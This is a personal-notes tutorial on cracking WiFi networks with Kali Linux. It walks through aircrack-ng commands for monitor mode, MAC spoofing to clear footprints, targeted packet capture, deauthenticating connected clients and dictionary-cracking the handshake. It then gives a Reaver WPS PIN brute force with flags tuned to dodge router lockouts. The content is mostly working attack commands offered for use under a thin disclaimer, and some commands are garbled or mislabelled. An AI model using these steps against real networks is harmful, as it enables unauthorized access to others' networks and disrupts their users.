Cracking the WiFi Networks WEP/WEP2/WPS

Disclaimer : This info is shared for education purpose only. I dont take any responsibility if any person/org uses it intentionally harm any one.

This less like a tutorial but more like my personal notes while studying the security.

Things you need : KALI Linux, Aircrank-ng suite (NO EXCEPTIONS) 1. Down the interface so its not connect to any network ifconfig wlan0 down

2. Start wlan0 on monitor mode, result would be mon0, mon1… mon# airmon-ng start wlan0

3. Change the mac on monitor interface (not needed but pen testing can’t be done without clearing out your own footprints) ifconfig mon0 down macchanger -r mon0 //this would give random mac address to monitor interface ifconfig mon0 up

4. Check if you got new mac address ifconfig man0

5. Dumping from specific channel airodump-ng mon0 -c 11

6. Starting the packing dump and writing

airodump-ng -w H6762 —bssid BC:CA:B5:39:67:60 -c 11 —ivs mon0 -w fileName That would use to make .ivs files —bssid AP’s Mac access -c Channel Number —ivs = only dump IV Intial Vector so dump file size is small mon0 - your interface which is monitoring

7. Check packet injection aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0

8. Deauthing the client so it would conenct again and we woudld get handshake between client and AP aireplay-ng —deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0

—deauth #number of packets -a Access point AKA Router -c Client or Station

9. Starting the dictionary attack to crack the handshake that we got from previous step aircrack-ng H6562-02.ivs -w /usr/share/wordlists/rockyou.txt

yup if password is in the text file. it would be crack 100% of time. There are bigger file that goes up to 15 gig uncompressed.

Please keep in mind brute force can take a lot of time. So In my opinion, its not practical approach for home users to crack some password with their home computer. No Offense.

---

Cracking WPS security Reaver way wash -i mon0 ver -i mon0 —channel 1 —essid SOME-2452 —bssid F8:EE:A5:WW:FF:50 -vv

Little bit description about WPS, Why its so much easier when comes to brute force

An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).

However since the 8th digit isn’t part of the pin it is just a check sum of the other 7, total = 10 to the 7th (10,000,000).

However WPS presents the pin in two halves for verification. So if one half of 4 digits are correct it will just work on the other half of 4.

Don’t forget the second half has one space for a check sum, so really it’s just 3 digits in the second half.

The correct total for WPS (10 to the 4th + 10 to the 3rd = 11,000). So the first half has 10,000 possible combinations and the second half has just 1,000.

Short keys (—dh-small,-S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.

Also things to note is that even tho the router says locked or no WPS hit it anyway(-L) to vet that because my recent tests show they are unlocked yet flagging locked.

What I used last..

“reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help”

-a Auto select some advanced features.

-S Use small diffleman attacks (reduces strain on the router & increases speed).

-N No nacks, just speeds things up a bit.

-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

-d The default delay period between pin attempts is 1 second.

-r Recurring delay. Sleep for y number of seconds every x pin attempts.